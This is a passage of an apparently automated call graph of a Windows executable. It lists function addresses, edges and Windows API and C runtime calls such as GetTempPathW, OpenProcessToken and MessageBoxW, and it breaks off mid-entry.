16132 7ff6d9242810 49 API calls 16128->16132 16134 7ff6d9243706 16128->16134 16129 7ff6d9243734 16567 7ff6d9242810 16129->16567 16131 7ff6d924374c __vcrt_FlsAlloc 16131->16121 16132->16134 16134->16124 16136 7ff6d92445c0 108 API calls 16135->16136 16137 7ff6d9241985 16136->16137 16138 7ff6d9241c43 16137->16138 16140 7ff6d9247f90 83 API calls 16137->16140 16139 7ff6d924c550 _log10_special 8 API calls 16138->16139 16141 7ff6d9241c5e 16139->16141 16142 7ff6d92419cb 16140->16142 16141->15934 16141->15935 16155 7ff6d9241a03 16142->16155 16980 7ff6d92506d4 16142->16980 16144 7ff6d925004c 74 API calls 16144->16138 16145 7ff6d92419e5 16146 7ff6d92419e9 16145->16146 16147 7ff6d9241a08 16145->16147 16149 7ff6d9254f08 _get_daylight 11 API calls 16146->16149 16984 7ff6d925039c 16147->16984 16150 7ff6d92419ee 16149->16150 16987 7ff6d9242910 16150->16987 16153 7ff6d9241a26 16156 7ff6d9254f08 _get_daylight 11 API calls 16153->16156 16154 7ff6d9241a45 16159 7ff6d9241a5c 16154->16159 16160 7ff6d9241a7b 16154->16160 16155->16144 16157 7ff6d9241a2b 16156->16157 16158 7ff6d9242910 54 API calls 16157->16158 16158->16155 16162 7ff6d9254f08 _get_daylight 11 API calls 16159->16162 16161 7ff6d9241c80 49 API calls 16160->16161 16164 7ff6d9241a92 16161->16164 16163 7ff6d9241a61 16162->16163 16165 7ff6d9242910 54 API calls 16163->16165 16166 7ff6d9241c80 49 API calls 16164->16166 16165->16155 16167 7ff6d9241add 16166->16167 16168 7ff6d92506d4 73 API calls 16167->16168 16169 7ff6d9241b01 16168->16169 16170 7ff6d9241b16 16169->16170 16171 7ff6d9241b35 16169->16171 16173 7ff6d9254f08 _get_daylight 11 API calls 16170->16173 16172 7ff6d925039c _fread_nolock 53 API calls 16171->16172 16174 7ff6d9241b4a 16172->16174 16175 7ff6d9241b1b 16173->16175 16176 7ff6d9241b50 16174->16176 16177 7ff6d9241b6f 16174->16177 16178 7ff6d9242910 54 API calls 16175->16178 16179 7ff6d9254f08 _get_daylight 11 API calls 16176->16179 17002 7ff6d9250110 16177->17002 16178->16155 16181 7ff6d9241b55 16179->16181 16183 7ff6d9242910 54 API calls 16181->16183 16183->16155 16184 7ff6d9242710 54 API calls 16184->16155 16186 7ff6d924883a 16185->16186 16187 7ff6d9249390 2 API calls 16186->16187 16188 7ff6d9248859 GetEnvironmentVariableW 16187->16188 16189 7ff6d9248876 ExpandEnvironmentStringsW 16188->16189 16190 7ff6d92488c2 16188->16190 16189->16190 16192 7ff6d9248898 16189->16192 16191 7ff6d924c550 _log10_special 8 API calls 16190->16191 16193 7ff6d92488d4 16191->16193 16194 7ff6d9249440 2 API calls 16192->16194 16193->15944 16195 7ff6d92488aa 16194->16195 16196 7ff6d924c550 _log10_special 8 API calls 16195->16196 16197 7ff6d92488ba 16196->16197 16197->15944 16199 7ff6d92490f5 16198->16199 17220 7ff6d9248570 GetCurrentProcess OpenProcessToken 16199->17220 16202 7ff6d9248570 7 API calls 16203 7ff6d9249121 16202->16203 16204 7ff6d924913a 16203->16204 16205 7ff6d9249154 16203->16205 16206 7ff6d92426b0 48 API calls 16204->16206 16207 7ff6d92426b0 48 API calls 16205->16207 16208 7ff6d9249152 16206->16208 16209 7ff6d9249167 LocalFree LocalFree 16207->16209 16208->16209 16210 7ff6d9249183 16209->16210 16212 7ff6d924918f 16209->16212 17230 7ff6d9242b50 16210->17230 16213 7ff6d924c550 _log10_special 8 API calls 16212->16213 16214 7ff6d9243c55 16213->16214 16214->15989 16215 7ff6d9248660 16214->16215 16216 7ff6d9248678 16215->16216 16217 7ff6d92486fa GetTempPathW GetCurrentProcessId 16216->16217 16218 7ff6d924869c 16216->16218 17239 7ff6d92425c0 16217->17239 16220 7ff6d9248830 14 API calls 16218->16220 16221 7ff6d92486a8 16220->16221 17246 7ff6d92481d0 16221->17246 16228 7ff6d9248728 __std_exception_copy 16238 7ff6d9248765 __std_exception_copy 16228->16238 17243 7ff6d9258b68 16228->17243 16232 7ff6d924c550 _log10_special 8 API calls 16234 7ff6d9243cbb 16232->16234 16234->15989 16234->16001 16239 7ff6d9249390 2 API calls 16238->16239 16247 7ff6d92487d4 __std_exception_copy 16238->16247 16240 7ff6d92487b1 16239->16240 16241 7ff6d92487b6 16240->16241 16242 7ff6d92487e9 16240->16242 16243 7ff6d9249390 2 API calls 16241->16243 16244 7ff6d9258238 38 API calls 16242->16244 16244->16247 16247->16232 16249 7ff6d92493b2 MultiByteToWideChar 16248->16249 16251 7ff6d92493d6 16248->16251 16249->16251 16252 7ff6d92493ec __std_exception_copy 16249->16252 16250 7ff6d92493f3 MultiByteToWideChar 16250->16252 16251->16250 16251->16252 16252->16000 16265 7ff6d92433ce __scrt_get_show_window_mode 16253->16265 16254 7ff6d924c550 _log10_special 8 API calls 16256 7ff6d9243664 16254->16256 16255 7ff6d92435c7 16255->16254 16256->16007 16272 7ff6d92490c0 LocalFree 16256->16272 16258 7ff6d9241c80 49 API calls 16258->16265 16259 7ff6d92435e2 16261 7ff6d9242710 54 API calls 16259->16261 16261->16255 16264 7ff6d92435c9 16267 7ff6d9242710 54 API calls 16264->16267 16265->16255 16265->16258 16265->16259 16265->16264 16266 7ff6d9242a50 54 API calls 16265->16266 16270 7ff6d92435d0 16265->16270 17535 7ff6d9244560 16265->17535 17541 7ff6d9247e20 16265->17541 17552 7ff6d9241600 16265->17552 17600 7ff6d9247120 16265->17600 17604 7ff6d9244190 16265->17604 17648 7ff6d9244450 16265->17648 16266->16265 16267->16255 16271 7ff6d9242710 54 API calls 16270->16271 16271->16255 16274 7ff6d9241ca5 16273->16274 16275 7ff6d9254984 49 API calls 16274->16275 16276 7ff6d9241cc8 16275->16276 16276->15939 16278 7ff6d9249390 2 API calls 16277->16278 16279 7ff6d92489b4 16278->16279 16280 7ff6d9258238 38 API calls 16279->16280 16281 7ff6d92489c6 __std_exception_copy 16280->16281 16281->15952 16283 7ff6d92445cc 16282->16283 16284 7ff6d9249390 2 API calls 16283->16284 16285 7ff6d92445f4 16284->16285 16286 7ff6d9249390 2 API calls 16285->16286 16287 7ff6d9244607 16286->16287 17837 7ff6d9255f94 16287->17837 16290 7ff6d924c550 _log10_special 8 API calls 16291 7ff6d924392b 16290->16291 16291->15942 16292 7ff6d9247f90 16291->16292 16293 7ff6d9247fb4 16292->16293 16294 7ff6d924808b __std_exception_copy 16293->16294 16295 7ff6d92506d4 73 API calls 16293->16295 16294->15946 16296 7ff6d9247fd0 16295->16296 16296->16294 18228 7ff6d92578c8 16296->18228 16298 7ff6d9247fe5 16298->16294 16299 7ff6d92506d4 73 API calls 16298->16299 16300 7ff6d925039c _fread_nolock 53 API calls 16298->16300 16299->16298 16300->16298 16302 7ff6d925007c 16301->16302 18243 7ff6d924fe28 16302->18243 16304 7ff6d9250095 16304->15942 16306 7ff6d924c850 16305->16306 16307 7ff6d9242734 GetCurrentProcessId 16306->16307 16308 7ff6d9241c80 49 API calls 16307->16308 16309 7ff6d9242787 16308->16309 16310 7ff6d9254984 49 API calls 16309->16310 16311 7ff6d92427cf 16310->16311 16312 7ff6d9242620 12 API calls 16311->16312 16313 7ff6d92427f1 16312->16313 16314 7ff6d924c550 _log10_special 8 API calls 16313->16314 16315 7ff6d9242801 16314->16315 16315->16007 16317 7ff6d9249390 2 API calls 16316->16317 16318 7ff6d924895c 16317->16318 16319 7ff6d9249390 2 API calls 16318->16319 16320 7ff6d924896c 16319->16320 16321 7ff6d9258238 38 API calls 16320->16321 16322 7ff6d924897a __std_exception_copy 16321->16322 16322->15956 16324 7ff6d924c559 16323->16324 16325 7ff6d9243ca7 16324->16325 16326 7ff6d924c8e0 IsProcessorFeaturePresent 16324->16326 16325->16064 16327 7ff6d924c8f8 16326->16327 18254 7ff6d924cad8 RtlCaptureContext 16327->18254 16333 7ff6d9241c80 49 API calls 16332->16333 16334 7ff6d92444fd 16333->16334 16334->15983 16336 7ff6d9241c80 49 API calls 16335->16336 16337 7ff6d9244660 16336->16337 16337->16001 16339 7ff6d9246dd5 16338->16339 16340 7ff6d9243e6c 16339->16340 16341 7ff6d9254f08 _get_daylight 11 API calls 16339->16341 16344 7ff6d9247340 16340->16344 16342 7ff6d9246de2 16341->16342 16343 7ff6d9242910 54 API calls 16342->16343 16343->16340 18259 7ff6d9241470 16344->18259 16346 7ff6d9247368 16347 7ff6d9244630 49 API calls 16346->16347 16358 7ff6d92474b9 __std_exception_copy 16346->16358 18365 7ff6d9246360 16412->18365 16420 7ff6d9243399 16421 7ff6d9243670 16420->16421 16442 7ff6d925a55c 16425->16442 16429 7ff6d925a84f 16429->16112 16541 7ff6d925546c EnterCriticalSection 16435->16541 16443 7ff6d925a578 GetLastError 16442->16443 16444 7ff6d925a5b3 16442->16444 16445 7ff6d925a588 16443->16445 16444->16429 16448 7ff6d925a5c8 16444->16448 16455 7ff6d925b390 16445->16455 16449 7ff6d925a5fc 16448->16449 16450 7ff6d925a5e4 GetLastError SetLastError 16448->16450 16449->16429 16451 7ff6d925a900 IsProcessorFeaturePresent 16449->16451 16450->16449 16452 7ff6d925a913 16451->16452 16533 7ff6d925a614 16452->16533 16456 7ff6d925b3ca FlsSetValue 16455->16456 16457 7ff6d925b3af FlsGetValue 16455->16457 16459 7ff6d925b3d7 16456->16459 16460 7ff6d925a5a3 SetLastError 16456->16460 16458 7ff6d925b3c4 16457->16458 16457->16460 16458->16456 16472 7ff6d925eb98 16459->16472 16460->16444 16462 7ff6d925b3e6 16463 7ff6d925b404 FlsSetValue 16462->16463 16464 7ff6d925b3f4 FlsSetValue 16462->16464 16466 7ff6d925b422 16463->16466 16467 7ff6d925b410 FlsSetValue 16463->16467 16465 7ff6d925b3fd 16464->16465 16479 7ff6d925a948 16465->16479 16485 7ff6d925aef4 16466->16485 16467->16465 16478 7ff6d925eba9 _get_daylight 16472->16478 16473 7ff6d925ebfa 16493 7ff6d9254f08 16473->16493 16474 7ff6d925ebde HeapAlloc 16476 7ff6d925ebf8 16474->16476 16474->16478 16476->16462 16478->16473 16478->16474 16490 7ff6d9263590 16478->16490 16480 7ff6d925a94d RtlFreeHeap 16479->16480 16481 7ff6d925a97c 16479->16481 16480->16481 16482 7ff6d925a968 GetLastError 16480->16482 16481->16460 16483 7ff6d925a975 Concurrency::details::SchedulerProxy::DeleteThis 16482->16483 16484 7ff6d9254f08 _get_daylight 9 API calls 16483->16484 16484->16481 16519 7ff6d925adcc 16485->16519 16496 7ff6d92635d0 16490->16496 16502 7ff6d925b2c8 GetLastError 16493->16502 16495 7ff6d9254f11 16495->16476 16501 7ff6d92602d8 EnterCriticalSection 16496->16501 16503 7ff6d925b309 FlsSetValue 16502->16503 16507 7ff6d925b2ec 16502->16507 16504 7ff6d925b31b 16503->16504 16516 7ff6d925b2f9 16503->16516 16506 7ff6d925eb98 _get_daylight 5 API calls 16504->16506 16505 7ff6d925b375 SetLastError 16505->16495 16508 7ff6d925b32a 16506->16508 16507->16503 16507->16516 16509 7ff6d925b348 FlsSetValue 16508->16509 16510 7ff6d925b338 FlsSetValue 16508->16510 16512 7ff6d925b366 16509->16512 16513 7ff6d925b354 FlsSetValue 16509->16513 16511 7ff6d925b341 16510->16511 16514 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16511->16514 16515 7ff6d925aef4 _get_daylight 5 API calls 16512->16515 16513->16511 16514->16516 16517 7ff6d925b36e 16515->16517 16516->16505 16518 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16517->16518 16518->16505 16531 7ff6d92602d8 EnterCriticalSection 16519->16531 16534 7ff6d925a64e __CxxCallCatchBlock __scrt_get_show_window_mode 16533->16534 16535 7ff6d925a676 RtlCaptureContext RtlLookupFunctionEntry 16534->16535 16536 7ff6d925a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16535->16536 16537 7ff6d925a6b0 RtlVirtualUnwind 16535->16537 16540 7ff6d925a738 __CxxCallCatchBlock 16536->16540 16537->16536 16538 7ff6d924c550 _log10_special 8 API calls 16539 7ff6d925a757 GetCurrentProcess TerminateProcess 16538->16539 16540->16538 16543 7ff6d92436bc GetModuleFileNameW 16542->16543 16543->16116 16543->16117 16545 7ff6d92492bf FindClose 16544->16545 16546 7ff6d92492d2 16544->16546 16545->16546 16547 7ff6d924c550 _log10_special 8 API calls 16546->16547 16548 7ff6d924371a 16547->16548 16548->16121 16548->16122 16550 7ff6d924c850 16549->16550 16551 7ff6d9242c70 GetCurrentProcessId 16550->16551 16580 7ff6d92426b0 16551->16580 16553 7ff6d9242cb9 16584 7ff6d9254bd8 16553->16584 16556 7ff6d92426b0 48 API calls 16557 7ff6d9242d34 FormatMessageW 16556->16557 16559 7ff6d9242d6d 16557->16559 16560 7ff6d9242d7f MessageBoxW 16557->16560 16561 7ff6d92426b0 48 API calls 16559->16561 16562 7ff6d924c550 _log10_special 8 API calls 16560->16562 16561->16560 16563 7ff6d9242daf 16562->16563 16563->16134 16565 7ff6d9249340 GetFinalPathNameByHandleW CloseHandle 16564->16565 16566 7ff6d9243730 16564->16566 16565->16566 16566->16129 16566->16131 16568 7ff6d9242834 16567->16568 16569 7ff6d92426b0 48 API calls 16568->16569 16570 7ff6d9242887 16569->16570 16571 7ff6d9254bd8 48 API calls 16570->16571 16572 7ff6d92428d0 MessageBoxW 16571->16572 16573 7ff6d924c550 _log10_special 8 API calls 16572->16573 16574 7ff6d9242900 16573->16574 16574->16134 16576 7ff6d924946a WideCharToMultiByte 16575->16576 16578 7ff6d9249495 16575->16578 16576->16578 16579 7ff6d92494ab __std_exception_copy 16576->16579 16577 7ff6d92494b2 WideCharToMultiByte 16577->16579 16578->16577 16578->16579 16579->16128 16581 7ff6d92426d5 16580->16581 16582 7ff6d9254bd8 48 API calls 16581->16582 16583 7ff6d92426f8 16582->16583 16583->16553 16587 7ff6d9254c32 16584->16587 16585 7ff6d9254c57 16586 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16585->16586 16592 7ff6d9254c81 16586->16592 16587->16585 16588 7ff6d9254c93 16587->16588 16602 7ff6d9252f90 16588->16602 16590 7ff6d9254d74 16591 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16590->16591 16591->16592 16593 7ff6d924c550 _log10_special 8 API calls 16592->16593 16594 7ff6d9242d04 16593->16594 16594->16556 16596 7ff6d9254d9a 16596->16590 16600 7ff6d9254da4 16596->16600 16597 7ff6d9254d49 16598 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16597->16598 16598->16592 16599 7ff6d9254d40 16599->16590 16599->16597 16601 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16600->16601 16601->16592 16603 7ff6d9252fce 16602->16603 16608 7ff6d9252fbe 16602->16608 16604 7ff6d9252fd7 16603->16604 16610 7ff6d9253005 16603->16610 16607 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16604->16607 16605 7ff6d9252ffd 16605->16590 16605->16596 16605->16597 16605->16599 16606 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16606->16605 16607->16605 16608->16606 16610->16605 16610->16608 16613 7ff6d92539a4 16610->16613 16646 7ff6d92533f0 16610->16646 16683 7ff6d9252b80 16610->16683 16614 7ff6d92539e6 16613->16614 16615 7ff6d9253a57 16613->16615 16616 7ff6d92539ec 16614->16616 16617 7ff6d9253a81 16614->16617 16618 7ff6d9253a5c 16615->16618 16619 7ff6d9253ab0 16615->16619 16620 7ff6d9253a20 16616->16620 16621 7ff6d92539f1 16616->16621 16706 7ff6d9251d54 16617->16706 16622 7ff6d9253a5e 16618->16622 16623 7ff6d9253a91 16618->16623 16624 7ff6d9253aba 16619->16624 16625 7ff6d9253ac7 16619->16625 16629 7ff6d9253abf 16619->16629 16627 7ff6d92539f7 16620->16627 16620->16629 16621->16625 16621->16627 16628 7ff6d9253a00 16622->16628 16633 7ff6d9253a6d 16622->16633 16713 7ff6d9251944 16623->16713 16624->16617 16624->16629 16720 7ff6d92546ac 16625->16720 16627->16628 16634 7ff6d9253a32 16627->16634 16642 7ff6d9253a1b 16627->16642 16644 7ff6d9253af0 16628->16644 16686 7ff6d9254158 16628->16686 16629->16644 16724 7ff6d9252164 16629->16724 16633->16617 16636 7ff6d9253a72 16633->16636 16634->16644 16696 7ff6d9254494 16634->16696 16636->16644 16702 7ff6d9254558 16636->16702 16638 7ff6d924c550 _log10_special 8 API calls 16640 7ff6d9253dea 16638->16640 16640->16610 16642->16644 16645 7ff6d9253cdc 16642->16645 16731 7ff6d92547c0 16642->16731 16644->16638 16645->16644 16737 7ff6d925ea08 16645->16737 16647 7ff6d9253414 16646->16647 16648 7ff6d92533fe 16646->16648 16651 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16647->16651 16652 7ff6d9253454 16647->16652 16649 7ff6d92539e6 16648->16649 16650 7ff6d9253a57 16648->16650 16648->16652 16653 7ff6d92539ec 16649->16653 16654 7ff6d9253a81 16649->16654 16655 7ff6d9253a5c 16650->16655 16656 7ff6d9253ab0 16650->16656 16651->16652 16652->16610 16657 7ff6d9253a20 16653->16657 16658 7ff6d92539f1 16653->16658 16663 7ff6d9251d54 38 API calls 16654->16663 16659 7ff6d9253a5e 16655->16659 16660 7ff6d9253a91 16655->16660 16661 7ff6d9253aba 16656->16661 16662 7ff6d9253ac7 16656->16662 16668 7ff6d9253abf 16656->16668 16664 7ff6d92539f7 16657->16664 16657->16668 16658->16662 16658->16664 16665 7ff6d9253a00 16659->16665 16670 7ff6d9253a6d 16659->16670 16666 7ff6d9251944 38 API calls 16660->16666 16661->16654 16661->16668 16669 7ff6d92546ac 45 API calls 16662->16669 16678 7ff6d9253a1b 16663->16678 16664->16665 16671 7ff6d9253a32 16664->16671 16664->16678 16667 7ff6d9254158 47 API calls 16665->16667 16681 7ff6d9253af0 16665->16681 16666->16678 16667->16678 16672 7ff6d9252164 38 API calls 16668->16672 16668->16681 16669->16678 16670->16654 16673 7ff6d9253a72 16670->16673 16674 7ff6d9254494 46 API calls 16671->16674 16671->16681 16672->16678 16676 7ff6d9254558 37 API calls 16673->16676 16673->16681 16674->16678 16675 7ff6d924c550 _log10_special 8 API calls 16677 7ff6d9253dea 16675->16677 16676->16678 16677->16610 16679 7ff6d92547c0 45 API calls 16678->16679 16678->16681 16682 7ff6d9253cdc 16678->16682 16679->16682 16680 7ff6d925ea08 46 API calls 16680->16682 16681->16675 16682->16680 16682->16681 16963 7ff6d9250fc8 16683->16963 16687 7ff6d925417e 16686->16687 16749 7ff6d9250b80 16687->16749 16692 7ff6d92542c3 16694 7ff6d92547c0 45 API calls 16692->16694 16695 7ff6d9254351 16692->16695 16693 7ff6d92547c0 45 API calls 16693->16692 16694->16695 16695->16642 16698 7ff6d92544c9 16696->16698 16697 7ff6d92544e7 16700 7ff6d925ea08 46 API calls 16697->16700 16698->16697 16699 7ff6d92547c0 45 API calls 16698->16699 16701 7ff6d925450e 16698->16701 16699->16697 16700->16701 16701->16642 16704 7ff6d9254579 16702->16704 16703 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16705 7ff6d92545aa 16703->16705 16704->16703 16704->16705 16705->16642 16707 7ff6d9251d87 16706->16707 16708 7ff6d9251db6 16707->16708 16710 7ff6d9251e73 16707->16710 16712 7ff6d9251df3 16708->16712 16895 7ff6d9250c28 16708->16895 16711 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16710->16711 16711->16712 16712->16642 16714 7ff6d9251977 16713->16714 16715 7ff6d92519a6 16714->16715 16717 7ff6d9251a63 16714->16717 16716 7ff6d9250c28 12 API calls 16715->16716 16719 7ff6d92519e3 16715->16719 16716->16719 16718 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16717->16718 16718->16719 16719->16642 16721 7ff6d92546ef 16720->16721 16723 7ff6d92546f3 __crtLCMapStringW 16721->16723 16903 7ff6d9254748 16721->16903 16723->16642 16725 7ff6d9252197 16724->16725 16726 7ff6d92521c6 16725->16726 16728 7ff6d9252283 16725->16728 16727 7ff6d9250c28 12 API calls 16726->16727 16730 7ff6d9252203 16726->16730 16727->16730 16729 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16728->16729 16729->16730 16730->16642 16732 7ff6d92547d7 16731->16732 16907 7ff6d925d9b8 16732->16907 16739 7ff6d925ea39 16737->16739 16747 7ff6d925ea47 16737->16747 16738 7ff6d925ea67 16741 7ff6d925ea78 16738->16741 16742 7ff6d925ea9f 16738->16742 16739->16738 16740 7ff6d92547c0 45 API calls 16739->16740 16739->16747 16740->16738 16953 7ff6d92600a0 16741->16953 16744 7ff6d925eb2a 16742->16744 16745 7ff6d925eac9 16742->16745 16742->16747 16746 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 16744->16746 16745->16747 16956 7ff6d925f8a0 16745->16956 16746->16747 16747->16645 16750 7ff6d9250ba6 16749->16750 16751 7ff6d9250bb7 16749->16751 16757 7ff6d925e570 16750->16757 16751->16750 16779 7ff6d925d5fc 16751->16779 16754 7ff6d9250bf8 16756 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16754->16756 16755 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16755->16754 16756->16750 16758 7ff6d925e58d 16757->16758 16759 7ff6d925e5c0 16757->16759 16760 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16758->16760 16759->16758 16762 7ff6d925e5f2 16759->16762 16769 7ff6d92542a1 16760->16769 16761 7ff6d925e705 16763 7ff6d925e7f7 16761->16763 16765 7ff6d925e7bd 16761->16765 16767 7ff6d925e78c 16761->16767 16770 7ff6d925e74f 16761->16770 16771 7ff6d925e745 16761->16771 16762->16761 16774 7ff6d925e63a 16762->16774 16819 7ff6d925da5c 16763->16819 16812 7ff6d925ddf4 16765->16812 16805 7ff6d925e0d4 16767->16805 16769->16692 16769->16693 16795 7ff6d925e304 16770->16795 16771->16765 16773 7ff6d925e74a 16771->16773 16773->16767 16773->16770 16774->16769 16786 7ff6d925a4a4 16774->16786 16777 7ff6d925a900 _isindst 17 API calls 16778 7ff6d925e854 16777->16778 16780 7ff6d925d60b _get_daylight 16779->16780 16781 7ff6d925d647 16779->16781 16780->16781 16783 7ff6d925d62e HeapAlloc 16780->16783 16785 7ff6d9263590 _get_daylight 2 API calls 16780->16785 16782 7ff6d9254f08 _get_daylight 11 API calls 16781->16782 16784 7ff6d9250be4 16782->16784 16783->16780 16783->16784 16784->16754 16784->16755 16785->16780 16787 7ff6d925a4bb 16786->16787 16788 7ff6d925a4b1 16786->16788 16789 7ff6d9254f08 _get_daylight 11 API calls 16787->16789 16788->16787 16793 7ff6d925a4d6 16788->16793 16790 7ff6d925a4c2 16789->16790 16828 7ff6d925a8e0 16790->16828 16791 7ff6d925a4ce 16791->16769 16791->16777 16793->16791 16794 7ff6d9254f08 _get_daylight 11 API calls 16793->16794 16794->16790 16831 7ff6d92640ac 16795->16831 16799 7ff6d925e3ac 16800 7ff6d925e401 16799->16800 16801 7ff6d925e3cc 16799->16801 16804 7ff6d925e3b0 16799->16804 16884 7ff6d925def0 16800->16884 16880 7ff6d925e1ac 16801->16880 16804->16769 16806 7ff6d92640ac 38 API calls 16805->16806 16807 7ff6d925e11e 16806->16807 16808 7ff6d9263af4 37 API calls 16807->16808 16809 7ff6d925e16e 16808->16809 16810 7ff6d925e172 16809->16810 16811 7ff6d925e1ac 45 API calls 16809->16811 16810->16769 16811->16810 16813 7ff6d92640ac 38 API calls 16812->16813 16814 7ff6d925de3f 16813->16814 16815 7ff6d9263af4 37 API calls 16814->16815 16816 7ff6d925de97 16815->16816 16817 7ff6d925de9b 16816->16817 16818 7ff6d925def0 45 API calls 16816->16818 16817->16769 16818->16817 16820 7ff6d925dad4 16819->16820 16821 7ff6d925daa1 16819->16821 16823 7ff6d925daec 16820->16823 16826 7ff6d925db6d 16820->16826 16822 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16821->16822 16825 7ff6d925dacd __scrt_get_show_window_mode 16822->16825 16824 7ff6d925ddf4 46 API calls 16823->16824 16824->16825 16825->16769 16826->16825 16827 7ff6d92547c0 45 API calls 16826->16827 16827->16825 16829 7ff6d925a778 _invalid_parameter_noinfo 37 API calls 16828->16829 16830 7ff6d925a8f9 16829->16830 16830->16791 16832 7ff6d92640ff fegetenv 16831->16832 16833 7ff6d9267e2c 37 API calls 16832->16833 16836 7ff6d9264152 16833->16836 16834 7ff6d9264242 16837 7ff6d9267e2c 37 API calls 16834->16837 16835 7ff6d926417f 16839 7ff6d925a4a4 __std_exception_copy 37 API calls 16835->16839 16836->16834 16840 7ff6d926421c 16836->16840 16841 7ff6d926416d 16836->16841 16838 7ff6d926426c 16837->16838 16842 7ff6d9267e2c 37 API calls 16838->16842 16843 7ff6d92641fd 16839->16843 16845 7ff6d925a4a4 __std_exception_copy 37 API calls 16840->16845 16841->16834 16841->16835 16846 7ff6d926427d 16842->16846 16844 7ff6d9265324 16843->16844 16851 7ff6d9264205 16843->16851 16847 7ff6d925a900 _isindst 17 API calls 16844->16847 16845->16843 16848 7ff6d9268020 20 API calls 16846->16848 16849 7ff6d9265339 16847->16849 16858 7ff6d92642e6 __scrt_get_show_window_mode 16848->16858 16850 7ff6d924c550 _log10_special 8 API calls 16852 7ff6d925e351 16850->16852 16851->16850 16876 7ff6d9263af4 16852->16876 16853 7ff6d926468f __scrt_get_show_window_mode 16854 7ff6d92649cf 16855 7ff6d9263c10 37 API calls 16854->16855 16862 7ff6d92650e7 16855->16862 16856 7ff6d926497b 16856->16854 16859 7ff6d926533c memcpy_s 37 API calls 16856->16859 16857 7ff6d9264327 memcpy_s 16869 7ff6d9264c6b memcpy_s __scrt_get_show_window_mode 16857->16869 16875 7ff6d9264783 memcpy_s __scrt_get_show_window_mode 16857->16875 16858->16853 16858->16857 16860 7ff6d9254f08 _get_daylight 11 API calls 16858->16860 16859->16854 16861 7ff6d9264760 16860->16861 16863 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 16861->16863 16865 7ff6d926533c memcpy_s 37 API calls 16862->16865 16874 7ff6d9265142 16862->16874 16863->16857 16864 7ff6d92652c8 16866 7ff6d9267e2c 37 API calls 16864->16866 16865->16874 16866->16851 16867 7ff6d9254f08 11 API calls _get_daylight 16867->16875 16868 7ff6d9254f08 11 API calls _get_daylight 16868->16869 16869->16854 16869->16856 16869->16868 16871 7ff6d925a8e0 37 API calls _invalid_parameter_noinfo 16869->16871 16870 7ff6d9263c10 37 API calls 16870->16874 16871->16869 16872 7ff6d925a8e0 37 API calls _invalid_parameter_noinfo 16872->16875 16873 7ff6d926533c memcpy_s 37 API calls 16873->16874 16874->16864 16874->16870 16874->16873 16875->16856 16875->16867 16875->16872 16877 7ff6d9263b13 16876->16877 16878 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16877->16878 16879 7ff6d9263b3e memcpy_s 16877->16879 16878->16879 16879->16799 16881 7ff6d925e1d8 memcpy_s 16880->16881 16882 7ff6d92547c0 45 API calls 16881->16882 16883 7ff6d925e292 memcpy_s __scrt_get_show_window_mode 16881->16883 16882->16883 16883->16804 16885 7ff6d925df2b 16884->16885 16889 7ff6d925df78 memcpy_s 16884->16889 16886 7ff6d925a814 _invalid_parameter_noinfo 37 API calls 16885->16886 16887 7ff6d925df57 16886->16887 16887->16804 16888 7ff6d925dfe3 16890 7ff6d925a4a4 __std_exception_copy 37 API calls 16888->16890 16889->16888 16891 7ff6d92547c0 45 API calls 16889->16891 16894 7ff6d925e025 memcpy_s 16890->16894 16891->16888 16892 7ff6d925a900 _isindst 17 API calls 16893 7ff6d925e0d0 16892->16893 16894->16892 16896 7ff6d9250c5f 16895->16896 16902 7ff6d9250c4e 16895->16902 16897 7ff6d925d5fc _fread_nolock 12 API calls 16896->16897 16896->16902 16898 7ff6d9250c90 16897->16898 16899 7ff6d9250ca4 16898->16899 16900 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16898->16900 16901 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16899->16901 16900->16899 16901->16902 16902->16712 16904 7ff6d9254766 16903->16904 16905 7ff6d925476e 16903->16905 16906 7ff6d92547c0 45 API calls 16904->16906 16905->16723 16906->16905 16908 7ff6d925d9d1 16907->16908 16910 7ff6d92547ff 16907->16910 16908->16910 16915 7ff6d9263304 16908->16915 16911 7ff6d925da24 16910->16911 16912 7ff6d925da3d 16911->16912 16913 7ff6d925480f 16911->16913 16912->16913 16950 7ff6d9262650 16912->16950 16913->16645 16927 7ff6d925b150 GetLastError 16915->16927 16918 7ff6d926335e 16918->16910 16928 7ff6d925b174 FlsGetValue 16927->16928 16929 7ff6d925b191 FlsSetValue 16927->16929 16930 7ff6d925b18b 16928->16930 16947 7ff6d925b181 16928->16947 16931 7ff6d925b1a3 16929->16931 16929->16947 16930->16929 16933 7ff6d925eb98 _get_daylight 11 API calls 16931->16933 16932 7ff6d925b1fd SetLastError 16934 7ff6d925b20a 16932->16934 16935 7ff6d925b21d 16932->16935 16936 7ff6d925b1b2 16933->16936 16934->16918 16949 7ff6d92602d8 EnterCriticalSection 16934->16949 16937 7ff6d925a504 __CxxCallCatchBlock 38 API calls 16935->16937 16938 7ff6d925b1d0 FlsSetValue 16936->16938 16939 7ff6d925b1c0 FlsSetValue 16936->16939 16942 7ff6d925b222 16937->16942 16940 7ff6d925b1dc FlsSetValue 16938->16940 16941 7ff6d925b1ee 16938->16941 16943 7ff6d925b1c9 16939->16943 16940->16943 16944 7ff6d925aef4 _get_daylight 11 API calls 16941->16944 16945 7ff6d925a948 